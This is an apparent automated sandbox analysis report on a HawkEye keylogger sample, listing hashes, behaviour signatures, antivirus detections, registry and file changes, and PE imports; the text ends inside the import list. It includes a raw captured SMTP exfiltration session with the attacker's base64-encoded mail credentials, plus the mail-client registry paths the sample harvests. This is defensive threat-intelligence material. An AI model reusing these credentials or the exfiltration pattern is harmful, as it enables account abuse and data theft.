HawkEye_da3a348100d6299a0e7018821c140111_exe_2019-06-27_09_30.json

1.  
2. [*] MalFamily: "Hawkeye"
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "HawkEye_da3a348100d6299a0e7018821c140111.exe"
7. [*] File Size: 845824
8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9. [*] SHA256: "b1b9d2352e3f8dd48efebb38f6d04b4fca123bd334c500af1f07045cea44ccb0"
10. [*] MD5: "da3a348100d6299a0e7018821c140111"
11. [*] SHA1: "28ac87bfc418d234f4ce4885e6df0f543f550c69"
12. [*] SHA512: "a6293b18731049bc501750e6cea501650116a7415636eb12caf58c627c6fa948c68f40583fdc4fdb25518b4aa9c3dc088dfa322e8169d8fb1cab41b0bcb4cbb8"
13. [*] CRC32: "35929ED9"
14. [*] SSDEEP: "24576:5mQFzDFCRUg2VxBOnwcZ31x7+09T3OV5tJ:nJdzOTw9"
15.  
16. [*] Process Execution: [
17. "HawkEye_da3a348100d6299a0e7018821c140111.exe",
18. "arinzand.exe",
19. "arinzand.exe",
20. "vbc.exe",
21. "dw20.exe",
22. "svchost.exe",
23. "WmiPrvSE.exe"
24. ]
25.  
26. [*] Signatures Detected: [
27. {
28. "Description": "Creates RWX memory",
29. "Details": []
30. },
31. {
32. "Description": "A process attempted to delay the analysis task.",
33. "Details": [
34. {
35. "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
36. },
37. {
38. "Process": "arinzand.exe tried to sleep 731 seconds, actually delayed analysis time by 0 seconds"
39. }
40. ]
41. },
42. {
43. "Description": "Starts servers listening on 127.0.0.1:0",
44. "Details": []
45. },
46. {
47. "Description": "Reads data out of its own binary image",
48. "Details": [
49. {
50. "self_read": "process: arinzand.exe, pid: 2564, offset: 0x00000000, length: 0x00001000"
51. },
52. {
53. "self_read": "process: arinzand.exe, pid: 2564, offset: 0x00000100, length: 0x00000200"
54. }
55. ]
56. },
57. {
58. "Description": "Drops a binary and executes it",
59. "Details": [
60. {
61. "binary": "C:\\Users\\user\\AppData\\Roaming\\arinzhdk\\arinzand.exe"
62. }
63. ]
64. },
65. {
66. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
67. "Details": [
68. {
69. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
70. },
71. {
72. "suspicious_request": "http://whatismyipaddress.com/"
73. }
74. ]
75. },
76. {
77. "Description": "Performs some HTTP requests",
78. "Details": [
79. {
80. "url": "http://whatismyipaddress.com/"
81. }
82. ]
83. },
84. {
85. "Description": "The binary likely contains encrypted or compressed data.",
86. "Details": [
87. {
88. "section": "name: .rsrc, entropy: 7.49, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00059200, virtual_size: 0x0005900c"
89. }
90. ]
91. },
92. {
93. "Description": "Looks up the external IP address",
94. "Details": [
95. {
96. "domain": "whatismyipaddress.com"
97. }
98. ]
99. },
100. {
101. "Description": "Executed a process and injected code into it, probably while unpacking",
102. "Details": [
103. {
104. "Injection": "arinzand.exe(1812) -> arinzand.exe(2564)"
105. }
106. ]
107. },
108. {
109. "Description": "Sniffs keystrokes",
110. "Details": [
111. {
112. "SetWindowsHookExA": "Process: arinzand.exe(2564)"
113. }
114. ]
115. },
116. {
117. "Description": "Exhibits behavior characteristics of HawkEye keylogger.",
118. "Details": [
119. {
120. "Host": "208.91.199.223:587"
121. },
122. {
123. "Hostname": "us2.smtp.mailhostbox.com"
124. },
125. {
126. "SMTP_Auth_Email": "arinze@accauto.co"
127. },
128. {
129. "SMTP_Mail_From": "<arinze@accauto.co>"
130. },
131. {
132. "SMTP_Send_To": "<arinze@accauto.co>"
133. }
134. ]
135. },
136. {
137. "Description": "Retrieves Windows ProductID, probably to fingerprint the sandbox",
138. "Details": []
139. },
140. {
141. "Description": "File has been identified by 42 Antiviruses on VirusTotal as malicious",
142. "Details": [
143. {
144. "MicroWorld-eScan": "Trojan.Agent.DZHI"
145. },
146. {
147. "FireEye": "Generic.mg.da3a348100d6299a"
148. },
149. {
150. "Qihoo-360": "HEUR/QVM05.1.2401.Malware.Gen"
151. },
152. {
153. "McAfee": "Packed-FUC!DA3A348100D6"
154. },
155. {
156. "Alibaba": "TrojanSpy:Application/Generic.001eb899"
157. },
158. {
159. "Arcabit": "Trojan.Agent.DZHI"
160. },
161. {
162. "NANO-Antivirus": "Trojan.Win32.Kryptik.frvmdm"
163. },
164. {
165. "Cyren": "W32/Trojan.JKZJ-5669"
166. },
167. {
168. "Symantec": "ML.Attribute.HighConfidence"
169. },
170. {
171. "ESET-NOD32": "a variant of Win32/Injector.EGGP"
172. },
173. {
174. "Paloalto": "generic.ml"
175. },
176. {
177. "Kaspersky": "HEUR:Trojan.Win32.Kryptik.gen"
178. },
179. {
180. "BitDefender": "Trojan.Agent.DZHI"
181. },
182. {
183. "ViRobot": "Trojan.Win32.Z.Injector.845824.AU"
184. },
185. {
186. "Avast": "Win32:Malware-gen"
187. },
188. {
189. "Ad-Aware": "Trojan.Agent.DZHI"
190. },
191. {
192. "Emsisoft": "Trojan.Agent.DZHI (B)"
193. },
194. {
195. "DrWeb": "Trojan.PWS.Stealer.23680"
196. },
197. {
198. "Invincea": "heuristic"
199. },
200. {
201. "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.cc"
202. },
203. {
204. "Trapmine": "malicious.high.ml.score"
205. },
206. {
207. "Sophos": "Mal/Fareit-V"
208. },
209. {
210. "Ikarus": "Win32.Outbreak"
211. },
212. {
213. "F-Prot": "W32/Trojan3.AOCN"
214. },
215. {
216. "Fortinet": "W32/Injector.EGGP!tr"
217. },
218. {
219. "Endgame": "malicious (high confidence)"
220. },
221. {
222. "Microsoft": "Trojan:Win32/Tiggre!rfn"
223. },
224. {
225. "AegisLab": "Trojan.Win32.Kryptik.4!c"
226. },
227. {
228. "ZoneAlarm": "HEUR:Trojan.Win32.Kryptik.gen"
229. },
230. {
231. "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
232. },
233. {
234. "Acronis": "suspicious"
235. },
236. {
237. "ALYac": "Trojan.Agent.DZHI"
238. },
239. {
240. "MAX": "malware (ai score=86)"
241. },
242. {
243. "VBA32": "TScope.Trojan.Delf"
244. },
245. {
246. "Cylance": "Unsafe"
247. },
248. {
249. "Rising": "Trojan.Injector!1.AFE3 (CLASSIC)"
250. },
251. {
252. "SentinelOne": "DFI - Suspicious PE"
253. },
254. {
255. "GData": "Trojan.Agent.DZHI"
256. },
257. {
258. "AVG": "Win32:Malware-gen"
259. },
260. {
261. "Cybereason": "malicious.fc418d"
262. },
263. {
264. "Panda": "Trj/Genetic.gen"
265. },
266. {
267. "CrowdStrike": "win/malicious_confidence_100% (W)"
268. }
269. ]
270. },
271. {
272. "Description": "Creates a copy of itself",
273. "Details": [
274. {
275. "copy": "C:\\Users\\user\\AppData\\Roaming\\arinzhdk\\arinzand.exe"
276. }
277. ]
278. },
279. {
280. "Description": "Harvests information related to installed instant messenger clients",
281. "Details": [
282. {
283. "key": "HKEY_CURRENT_USER\\Software\\Google\\Google Talk\\Accounts"
284. }
285. ]
286. },
287. {
288. "Description": "Harvests information related to installed mail clients",
289. "Details": [
290. {
291. "file": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.oeaccount"
292. },
293. {
294. "file": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.*"
295. },
296. {
297. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles"
298. },
299. {
300. "key": "HKEY_CURRENT_USER\\Identities\\{0A258175-2D14-4D69-9955-E200F247250F}\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
301. },
302. {
303. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
304. },
305. {
306. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts"
307. },
308. {
309. "key": "HKEY_CURRENT_USER\\Identities\\{0A258175-2D14-4D69-9955-E200F247250F}\\Software\\Microsoft\\Internet Account Manager\\Accounts"
310. }
311. ]
312. },
313. {
314. "Description": "Makes SMTP requests, possibly sending spam or exfiltrating data.",
315. "Details": [
316. {
317. "SMTP": "208.91.199.223 (us2.smtp.mailhostbox.com)"
318. }
319. ]
320. },
321. {
322. "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
323. "Details": [
324. {
325. "file": "C:\\Users\\user\\AppData\\Roaming\\arinzhdk\\arinzand.exe:ZoneIdentifier"
326. }
327. ]
328. },
329. {
330. "Description": "Collects information to fingerprint the system",
331. "Details": []
332. },
333. {
334. "Description": "Anomalous binary characteristics",
335. "Details": [
336. {
337. "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
338. }
339. ]
340. },
341. {
342. "Description": "Attempts to modify Explorer settings to prevent hidden files from being displayed",
343. "Details": []
344. }
345. ]
346.  
347. [*] Started Service: []
348.  
349. [*] Executed Commands: [
350. "\"C:\\Users\\user\\AppData\\Roaming\\arinzhdk\\arinzand.exe\"",
351. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\holdermail.txt\"",
352. "dw20.exe -x -s 1348",
353. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
354. ]
355.  
356. [*] Mutexes: [
357. "Global\\CLR_CASOFF_MUTEX",
358. "Global\\.net clr networking",
359. "Global\\8455b688-98b8-11e9-8070-18c086cd4729",
360. "CicLoadWinStaWinSta0",
361. "Local\\MSCTF.CtfMonitorInstMutexDefault1"
362. ]
363.  
364. [*] Modified Files: [
365. "C:\\Users\\user\\AppData\\Roaming\\arinzhdk\\arinzand.exe",
366. "C:\\Users\\user\\AppData\\Roaming\\arinzhdk\\arinzand.exe:ZoneIdentifier",
367. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
368. "C:\\Users\\user\\AppData\\Roaming\\pid.txt",
369. "C:\\Users\\user\\AppData\\Roaming\\pidloc.txt",
370. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
371. "\\??\\PIPE\\wkssvc",
372. "\\??\\PIPE\\srvsvc",
373. "C:\\Users\\user\\AppData\\Local\\Temp\\holdermail.txt",
374. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportArchive\\AppCrash_arinzand.exe_7522584245ac4b366ff7d583afcf77712332a5_0ac4d2ef\\Report.wer"
375. ]
376.  
377. [*] Deleted Files: [
378. "C:\\Users\\user\\AppData\\Roaming\\arinzhdk\\arinzand.exe",
379. "C:\\Users\\user\\AppData\\Local\\Temp\\holdermail.txt"
380. ]
381.  
382. [*] Modified Registry Keys: [
383. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\arinzand_RASAPI32",
384. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\arinzand_RASAPI32\\EnableFileTracing",
385. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\arinzand_RASAPI32\\EnableConsoleTracing",
386. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\arinzand_RASAPI32\\FileTracingMask",
387. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\arinzand_RASAPI32\\ConsoleTracingMask",
388. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\arinzand_RASAPI32\\MaxFileSize",
389. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\arinzand_RASAPI32\\FileDirectory",
390. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden"
391. ]
392.  
393. [*] Deleted Registry Keys: []
394.  
395. [*] DNS Communications: [
396. {
397. "type": "A",
398. "request": "whatismyipaddress.com",
399. "answers": [
400. {
401. "data": "104.16.154.36",
402. "type": "A"
403. },
404. {
405. "data": "104.16.155.36",
406. "type": "A"
407. }
408. ]
409. },
410. {
411. "type": "A",
412. "request": "us2.smtp.mailhostbox.com",
413. "answers": [
414. {
415. "data": "208.91.199.224",
416. "type": "A"
417. },
418. {
419. "data": "208.91.199.223",
420. "type": "A"
421. },
422. {
423. "data": "208.91.199.225",
424. "type": "A"
425. },
426. {
427. "data": "208.91.198.143",
428. "type": "A"
429. }
430. ]
431. }
432. ]
433.  
434. [*] Domains: [
435. {
436. "ip": "208.91.199.225",
437. "domain": "us2.smtp.mailhostbox.com"
438. },
439. {
440. "ip": "104.16.154.36",
441. "domain": "whatismyipaddress.com"
442. }
443. ]
444.  
445. [*] Network Communication - ICMP: []
446.  
447. [*] Network Communication - HTTP: [
448. {
449. "count": 1,
450. "body": "",
451. "uri": "http://whatismyipaddress.com/",
452. "user-agent": "",
453. "method": "GET",
454. "host": "whatismyipaddress.com",
455. "version": "1.1",
456. "path": "/",
457. "data": "GET / HTTP/1.1\r\nHost: whatismyipaddress.com\r\nConnection: Keep-Alive\r\n\r\n",
458. "port": 80
459. }
460. ]
461.  
462. [*] Network Communication - SMTP: [
463. {
464. "raw": "EHLO Host\r\nAUTH login YXJpbnplQGFjY2F1dG8uY28=\r\nNzIxMzU3NWFjZUFDRUA=\r\nMAIL FROM:<arinze@accauto.co>\r\nRCPT TO:<arinze@accauto.co>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: arinze@accauto.co\r\nTo: arinze@accauto.co\r\nDate: 27 Jun 2019 07:43:39 -0700\r\nSubject: Logger - Server Ran - [Host]\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nThis is an email notifying you that Host has ran your logger and emails=\r\n should be sent to you shortly and at interval choosen.=0D=0A =0D=0ALogger=\r\n Details: =0D=0AServer Name: arinzand.exe=0D=0AKeylogger Enabled: True=0D=0AClipboard-Logger=\r\n Enabled: True=0D=0ATime Logs will be delivered: Every 5 minutes=0D=0A =\r\n=0D=0AStealers Enabled: True=0D=0ATime Log will be delivered: Average 2=\r\n to 4 minutes=0D=0A =0D=0ALocal Date and Time: 6/27/2019 7:34:18 AM=0D=0AInstalled=\r\n Language: en-US=0D=0AOperating System: Microsoft Windows 7 Enterprise N=\r\n =0D=0AInternal IP Address: 192.168.56.110=0D=0AExternal IP Address: =0D=0AInstalled=\r\n Anti-Virus: =0D=0AInstalled Firewall: \r\n\r\n.\r\n",
465. "dst": "208.91.199.223"
466. }
467. ]
468.  
469. [*] Network Communication - Hosts: []
470.  
471. [*] Network Communication - IRC: []
472.  
473. [*] Static Analysis: {
474. "pe": {
475. "peid_signatures": null,
476. "imports": [
477. {
478. "imports": [
479. {
480. "name": "DeleteCriticalSection",
481. "address": "0x46f168"
482. },
483. {
484. "name": "LeaveCriticalSection",
485. "address": "0x46f16c"
486. },
487. {
488. "name": "EnterCriticalSection",
489. "address": "0x46f170"
490. },
491. {
492. "name": "InitializeCriticalSection",
493. "address": "0x46f174"
494. },
495. {
496. "name": "VirtualFree",
497. "address": "0x46f178"
498. },
499. {
500. "name": "VirtualAlloc",
501. "address": "0x46f17c"
502. },
503. {
504. "name": "LocalFree",
505. "address": "0x46f180"
506. },
507. {
508. "name": "LocalAlloc",
509. "address": "0x46f184"
510. },
511. {
512. "name": "GetVersion",
513. "address": "0x46f188"
514. },
515. {
516. "name": "GetCurrentThreadId",
517. "address": "0x46f18c"
518. },
519. {
520. "name": "InterlockedDecrement",
521. "address": "0x46f190"
522. },
523. {
524. "name": "InterlockedIncrement",
525. "address": "0x46f194"
526. },
527. {
528. "name": "VirtualQuery",
529. "address": "0x46f198"
530. },
531. {
532. "name": "WideCharToMultiByte",
533. "address": "0x46f19c"
534. },
535. {
536. "name": "MultiByteToWideChar",
537. "address": "0x46f1a0"
538. },
539. {
540. "name": "lstrlenA",
541. "address": "0x46f1a4"
542. },
543. {
544. "name": "lstrcpynA",
545. "address": "0x46f1a8"
546. },
547. {
548. "name": "LoadLibraryExA",
549. "address": "0x46f1ac"
550. },
551. {
552. "name": "GetThreadLocale",
553. "address": "0x46f1b0"
554. },
555. {
556. "name": "GetStartupInfoA",
557. "address": "0x46f1b4"
558. },
559. {
560. "name": "GetProcAddress",
561. "address": "0x46f1b8"
562. },
563. {
564. "name": "GetModuleHandleA",
565. "address": "0x46f1bc"
566. },
567. {
568. "name": "GetModuleFileNameA",
569. "address": "0x46f1c0"
570. },
571. {
572. "name": "GetLocaleInfoA",
573. "address": "0x46f1c4"
574. },
575. {
576. "name": "GetCommandLineA",
577. "address": "0x46f1c8"
578. },
579. {
580. "name": "FreeLibrary",
581. "address": "0x46f1cc"
582. },
583. {
584. "name": "FindFirstFileA",
585. "address": "0x46f1d0"
586. },
587. {
588. "name": "FindClose",
589. "address": "0x46f1d4"
590. },
591. {
592. "name": "ExitProcess",
593. "address": "0x46f1d8"
594. },
595. {
596. "name": "WriteFile",
597. "address": "0x46f1dc"
598. },
599. {
600. "name": "UnhandledExceptionFilter",
601. "address": "0x46f1e0"
602. },
603. {
604. "name": "RtlUnwind",
605. "address": "0x46f1e4"
606. },
607. {
608. "name": "RaiseException",
609. "address": "0x46f1e8"
610. },
611. {
612. "name": "GetStdHandle",
613. "address": "0x46f1ec"
614. }
615. ],
616. "dll": "kernel32.dll"
617. },
618. {
619. "imports": [
620. {
621. "name": "GetKeyboardType",
622. "address": "0x46f1f4"
623. },
624. {
625. "name": "LoadStringA",
626. "address": "0x46f1f8"
627. },
628. {
629. "name": "MessageBoxA",
630. "address": "0x46f1fc"
631. },
632. {
633. "name": "CharNextA",
634. "address": "0x46f200"
635. }
636. ],
637. "dll": "user32.dll"
638. },
639. {
640. "imports": [
641. {
642. "name": "RegQueryValueExA",
643. "address": "0x46f208"
644. },
645. {
646. "name": "RegOpenKeyExA",
647. "address": "0x46f20c"
648. },
649. {
650. "name": "RegCloseKey",
651. "address": "0x46f210"
652. }
653. ],
654. "dll": "advapi32.dll"
655. },
656. {
657. "imports": [
658. {
659. "name": "SysFreeString",
660. "address": "0x46f218"
661. },
662. {
663. "name": "SysReAllocStringLen",
664. "address": "0x46f21c"
665. },
666. {
667. "name": "SysAllocStringLen",
668. "address": "0x46f220"
669. }
670. ],
671. "dll": "oleaut32.dll"
672. },
673. {
674. "imports": [
675. {
676. "name": "TlsSetValue",
677. "address": "0x46f228"
678. },
679. {
680. "name": "TlsGetValue",
681. "address": "0x46f22c"
682. },
683. {
684. "name": "LocalAlloc",
685. "address": "0x46f230"
686. },
687. {
688. "name": "GetModuleHandleA",
689. "address": "0x46f234"
690. }
691. ],
692. "dll": "kernel32.dll"
693. },
694. {
695. "imports": [
696. {
697. "name": "RegQueryValueExA",
698. "address": "0x46f23c"
699. },
700. {
701. "name": "RegOpenKeyExA",
702. "address": "0x46f240"
703. },
704. {
705. "name": "RegCloseKey",
706. "address": "0x46f244"
707. }
708. ],
709. "dll": "advapi32.dll"
710. },
711. {
712. "imports": [
713. {
714. "name": "lstrcpyA",
715. "address": "0x46f24c"
716. },
717. {
718. "name": "WriteFile",
719. "address": "0x46f250"
720. },
721. {
722. "name": "WaitForSingleObject",
723. "address": "0x46f254"
724. },
725. {
726. "name": "VirtualQuery",
727. "address": "0x46f258"
728. },
729. {
730. "name": "VirtualAlloc",
731. "address": "0x46f25c"
732. },
733. {
734. "name": "Sleep",
735. "address": "0x46f260"
736. },
737. {
738. "name": "SizeofResource",
739. "address": "0x46f264"
740. },
741. {
742. "name": "SetThreadLocale",
743. "address": "0x46f268"
744. },
745. {
746. "name": "SetFilePointer",
747. "address": "0x46f26c"
748. },
749. {
750. "name": "SetEvent",
751. "address": "0x46f270"
752. },
753. {
754. "name": "SetErrorMode",
755. "address": "0x46f274"
756. },
757. {
758. "name": "SetEndOfFile",
759. "address": "0x46f278"
760. },
761. {
762. "name": "ResetEvent",
763. "address": "0x46f27c"
764. },
765. {
766. "name": "ReadFile",
767. "address": "0x46f280"
768. },
769. {
770. "name": "MultiByteToWideChar",
771. "address": "0x46f284"
772. },
773. {
774. "name": "MulDiv",
775. "address": "0x46f288"
776. },
777. {
778. "name": "LockResource",
779. "address": "0x46f28c"
780. },
781. {
782. "name": "LoadResource",
783. "address": "0x46f290"
784. },
785. {
786. "name": "LoadLibraryA",
787. "address": "0x46f294"
788. },
789. {
790. "name": "LeaveCriticalSection",
791. "address": "0x46f298"
792. },
793. {
794. "name": "InitializeCriticalSection",
795. "address": "0x46f29c"
796. },
797. {
798. "name": "GlobalUnlock",
799. "address": "0x46f2a0"
800. },
801. {
802. "name": "GlobalSize",
803. "address": "0x46f2a4"
804. },
805. {
806. "name": "GlobalReAlloc",
807. "address": "0x46f2a8"
808. },
809. {
810. "name": "GlobalHandle",
811. "address": "0x46f2ac"
812. },
813. {
814. "name": "GlobalLock",
815. "address": "0x46f2b0"
816. },
817. {
818. "name": "GlobalFree",
819. "address": "0x46f2b4"
820. },
821. {
822. "name": "GlobalFindAtomA",
823. "address": "0x46f2b8"
824. },
825. {
826. "name": "GlobalDeleteAtom",
827. "address": "0x46f2bc"
828. },
829. {
830. "name": "GlobalAlloc",
831. "address": "0x46f2c0"
832. },
833. {
834. "name": "GlobalAddAtomA",
835. "address": "0x46f2c4"
836. },
837. {
838. "name": "GetVersionExA",
839. "address": "0x46f2c8"
840. },
841. {
842. "name": "GetVersion",
843. "address": "0x46f2cc"
844. },
845. {
846. "name": "GetUserDefaultLCID",
847. "address": "0x46f2d0"
848. },
849. {
850. "name": "GetTickCount",
851. "address": "0x46f2d4"
852. },
853. {
854. "name": "GetThreadLocale",
855. "address": "0x46f2d8"
856. },
857. {
858. "name": "GetSystemInfo",
859. "address": "0x46f2dc"
860. },
861. {
862. "name": "GetStringTypeExA",
863. "address": "0x46f2e0"
864. },
865. {
866. "name": "GetStdHandle",
867. "address": "0x46f2e4"
868. },
869. {
870. "name": "GetProfileStringA",
871. "address": "0x46f2e8"
872. },
873. {
874. "name": "GetProcAddress",
875. "address": "0x46f2ec"
876. },
877. {
878. "name": "GetModuleHandleA",
879. "address": "0x46f2f0"
880. },
881. {
882. "name": "GetModuleFileNameA",
883. "address": "0x46f2f4"
884. },
885. {
886. "name": "GetLocaleInfoA",
887. "address": "0x46f2f8"
888. },
889. {
890. "name": "GetLocalTime",
891. "address": "0x46f2fc"
892. },
893. {
894. "name": "GetLastError",
895. "address": "0x46f300"
896. },
897. {
898. "name": "GetFullPathNameA",
899. "address": "0x46f304"
900. },
901. {
902. "name": "GetDiskFreeSpaceA",
903. "address": "0x46f308"
904. },
905. {
906. "name": "GetDateFormatA",
907. "address": "0x46f30c"
908. },
909. {
910. "name": "GetCurrentThreadId",
911. "address": "0x46f310"
912. },
913. {
914. "name": "GetCurrentProcessId",
915. "address": "0x46f314"
916. },
917. {
918. "name": "GetComputerNameA",
919. "address": "0x46f318"
920. },
921. {
922. "name": "GetCPInfo",
923. "address": "0x46f31c"
924. },
925. {
926. "name": "GetACP",
927. "address": "0x46f320"
928. },
929. {
930. "name": "FreeResource",
931. "address": "0x46f324"
932. },
933. {
934. "name": "InterlockedExchange",
935. "address": "0x46f328"
936. },
937. {
938. "name": "FreeLibrary",
939. "address": "0x46f32c"
940. },
941. {
942. "name": "FormatMessageA",
943. "address": "0x46f330"
944. },
945. {
946. "name": "FindResourceA",
947. "address": "0x46f334"
948. },
949. {
950. "name": "EnumCalendarInfoA",
951. "address": "0x46f338"
952. },
953. {
954. "name": "EnterCriticalSection",
955. "address": "0x46f33c"
956. },
957. {
958. "name": "DeleteCriticalSection",
959. "address": "0x46f340"
960. },
961. {
962. "name": "CreateThread",
963. "address": "0x46f344"
964. },
965. {
966. "name": "CreateFileA",
967. "address": "0x46f348"
968. },
969. {
970. "name": "CreateEventA",
971. "address": "0x46f34c"
972. },
973. {
974. "name": "CompareStringA",
975. "address": "0x46f350"
976. },
977. {
978. "name": "CloseHandle",
979. "address": "0x46f354"
980. }
981. ],
982. "dll": "kernel32.dll"
983. },
984. {
985. "imports": [
986. {
987. "name": "VerQueryValueA",
988. "address": "0x46f35c"
989. },
990. {
991. "name": "GetFileVersionInfoSizeA",
992. "address": "0x46f360"
993. },
994. {
995. "name": "GetFileVersionInfoA",
996. "address": "0x46f364"
997. }
998. ],
999. "dll": "version.dll"
1000. },
1001. {
1002. "imports": [
1003. {
1004. "name": "UnrealizeObject",
1005. "address": "0x46f36c"
1006. },
1007. {
1008. "name": "StretchBlt",
1009. "address": "0x46f370"
1010. },
1011. {
1012. "name": "SetWindowOrgEx",
1013. "address": "0x46f374"
1014. },
1015. {
1016. "name": "SetWinMetaFileBits",
1017. "address": "0x46f378"
1018. },
1019. {
1020. "name": "SetViewportOrgEx",
1021. "address": "0x46f37c"
1022. },
1023. {
1024. "name": "SetTextColor",
1025. "address": "0x46f380"
1026. },
1027. {
1028. "name": "SetStretchBltMode",
1029. "address": "0x46f384"
1030. },
1031. {
1032. "name": "SetROP2",
1033. "address": "0x46f388"
1034. },
1035. {
1036. "name": "SetPixel",
1037. "address": "0x46f38c"
1038. },
1039. {
1040. "name": "SetMapMode",
1041. "address": "0x46f390"
1042. },
1043. {
1044. "name": "SetEnhMetaFileBits",
1045. "address": "0x46f394"
1046. },
1047. {
1048. "name": "SetDIBColorTable",
1049. "address": "0x46f398"
1050. },
1051. {
1052. "name": "SetBrushOrgEx",
1053. "address": "0x46f39c"
1054. },
1055. {
1056. "name": "SetBkMode",
1057. "address": "0x46f3a0"
1058. },
1059. {
1060. "name": "SetBkColor",
1061. "address": "0x46f3a4"
1062. },
1063. {
1064. "name": "SelectPalette",
1065. "address": "0x46f3a8"
1066. },
1067. {
1068. "name": "SelectObject",
1069. "address": "0x46f3ac"
1070. },
1071. {
1072. "name": "SelectClipRgn",
1073. "address": "0x46f3b0"
1074. },
1075. {
1076. "name": "ScaleWindowExtEx",
1077. "address": "0x46f3b4"
1078. },
1079. {
1080. "name": "SaveDC",
1081. "address": "0x46f3b8"
1082. },
1083. {
1084. "name": "RestoreDC",
1085. "address": "0x46f3bc"
1086. },
1087. {
1088. "name": "RectVisible",
1089. "address": "0x46f3c0"
1090. },
1091. {
1092. "name": "RealizePalette",
1093. "address": "0x46f3c4"
1094. },
1095. {
1096. "name": "PlayEnhMetaFile",
1097. "address": "0x46f3c8"
1098. },
1099. {
1100. "name": "PathToRegion",
1101. "address": "0x46f3cc"
1102. },
1103. {
1104. "name": "PatBlt",
1105. "address": "0x46f3d0"
1106. },
1107. {
1108. "name": "MoveToEx",
1109. "address": "0x46f3d4"
1110. },
1111. {
1112. "name": "MaskBlt",
1113. "address": "0x46f3d8"
1114. },
1115. {
1116. "name": "LineTo",
1117. "address": "0x46f3dc"
1118. },
1119. {
1120. "name": "LPtoDP",
1121. "address": "0x46f3e0"
1122. },
1123. {
1124. "name": "IntersectClipRect",
1125. "address": "0x46f3e4"
1126. },
1127. {
1128. "name": "GetWindowOrgEx",
1129. "address": "0x46f3e8"
1130. },
1131. {
1132. "name": "GetWinMetaFileBits",
1133. "address": "0x46f3ec"
1134. },
1135. {
1136. "name": "GetTextMetricsA",
1137. "address": "0x46f3f0"
1138. },
1139. {
1140. "name": "GetTextExtentPoint32A",
1141. "address": "0x46f3f4"
1142. },
1143. {
1144. "name": "GetSystemPaletteEntries",
1145. "address": "0x46f3f8"
1146. },
1147. {
1148. "name": "GetStockObject",
1149. "address": "0x46f3fc"
1150. },
1151. {
1152. "name": "GetPixel",
1153. "address": "0x46f400"
1154. },
1155. {
1156. "name": "GetPaletteEntries",
1157. "address": "0x46f404"
1158. },
1159. {
1160. "name": "GetObjectA",
1161. "address": "0x46f408"
1162. },
1163. {
1164. "name": "GetEnhMetaFilePaletteEntries",
1165. "address": "0x46f40c"
1166. },
1167. {
1168. "name": "GetEnhMetaFileHeader",
1169. "address": "0x46f410"
1170. },
1171. {
1172. "name": "GetEnhMetaFileDescriptionA",
1173. "address": "0x46f414"
1174. },
1175. {
1176. "name": "GetEnhMetaFileBits",
1177. "address": "0x46f418"
1178. },
1179. {
1180. "name": "GetDeviceCaps",
1181. "address": "0x46f41c"
1182. },
1183. {
1184. "name": "GetDIBits",
1185. "address": "0x46f420"
1186. },
1187. {
1188. "name": "GetDIBColorTable",
1189. "address": "0x46f424"
1190. },
1191. {
1192. "name": "GetDCOrgEx",
1193. "address": "0x46f428"
1194. },
1195. {
1196. "name": "GetCurrentPositionEx",
1197. "address": "0x46f42c"
1198. },
1199. {
1200. "name": "GetClipBox",
1201. "address": "0x46f430"
1202. },
1203. {
1204. "name": "GetBrushOrgEx",
1205. "address": "0x46f434"
1206. },
1207. {
1208. "name": "GetBitmapBits",
1209. "address": "0x46f438"
1210. },
1211. {
1212. "name": "ExcludeClipRect",
1213. "address": "0x46f43c"
1214. },
1215. {
1216. "name": "EndPage",
1217. "address": "0x46f440"
1218. },
1219. {
1220. "name": "EndDoc",
1221. "address": "0x46f444"
1222. },
1223. {
1224. "name": "DeleteObject",
1225. "address": "0x46f448"
1226. },
1227. {
1228. "name": "DeleteEnhMetaFile",
1229. "address": "0x46f44c"
1230. },
1231. {
1232. "name": "DeleteDC",
1233. "address": "0x46f450"
1234. },
1235. {
1236. "name": "CreateSolidBrush",
1237. "address": "0x46f454"
1238. },
1239. {
1240. "name": "CreatePenIndirect",
1241. "address": "0x46f458"
1242. },
1243. {
1244. "name": "CreatePalette",
1245. "address": "0x46f45c"
1246. },
